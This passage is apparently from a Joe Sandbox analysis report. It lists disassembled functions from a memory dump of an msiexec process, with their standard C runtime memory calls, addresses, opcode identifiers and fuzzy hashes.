                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3110682361-0
                                                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3510742995-0
                                                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                              APIs
                                                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                              • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                              • Opcode Fuzzy Hash: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                              • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 0040797A
                                                                                              • free.MSVCRT ref: 0040799A
                                                                                                • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                              • free.MSVCRT ref: 004079BD
                                                                                              • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3669619086-0
                                                                                              • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                              • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                              • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                              • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: 1226329fef66c94fa82ba57e72c46c46c6e0dffed67700a76cfead9af7fedf55
                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                              • Opcode Fuzzy Hash: 1226329fef66c94fa82ba57e72c46c46c6e0dffed67700a76cfead9af7fedf55
                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09